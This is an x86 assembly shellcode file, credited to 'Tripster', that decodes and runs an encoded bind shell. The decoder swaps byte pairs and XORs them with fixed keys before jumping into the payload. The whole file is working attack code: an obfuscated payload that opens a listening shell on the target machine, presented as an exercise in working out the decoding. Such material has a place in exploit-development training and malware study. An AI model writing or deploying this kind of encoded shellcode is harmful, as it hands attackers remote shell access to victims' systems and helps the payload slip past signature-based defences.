;decoding bind shell
;Author : Tripster

;As an exercise why don't you try to find out the decoding function I applied ;)
global _start
section .text
_start:
	jmp short encodedpart
decoder:
	pop esi
	xor eax,eax
decode:
	cmp byte[esi],0xdd
	jz short encoded_shellcode
	mov al,byte[esi]
	xchg byte[esi+1],al
	mov [esi],al
	xor byte[esi],0x98	
	xor byte[esi],0x19
	xor byte[esi+1],0x08
	xor byte[esi+1],0x02
	add esi,2
	jmp short decode
	
encodedpart:

;shellcode taken from decoder
	call decoder
	encoded_shellcode: db 0xd1,0xb0,0xe9,0x76,0x49,0xd2,0x60,0xd2,0x83,0x83,0xba,0x60,0xc7,0xe7,0x51,0x01,0x58,0xdf,0x08,0xe9,0x1b,0x81,0x60,0xdd,0x5b,0x91,0x83,0xd1,0x60,0x60,0x52,0xe7,0x8a,0x4c,0x4b,0x08,0xb9,0x85,0xba,0x85,0xc7,0xe7,0x49,0x01,0x6c,0x31,0x8a,0x4c,0x53,0x12,0x35,0xeb,0xc7,0xd9,0x43,0x01,0xf2,0xf8,0x25,0xe9,0x79,0xae,0x62,0xe9,0x68,0xae,0x64,0xe8,0xe9,0x08,0x59,0xd1,0xeb,0x08,0x01,0x31,0x8a,0x4c,0xdd
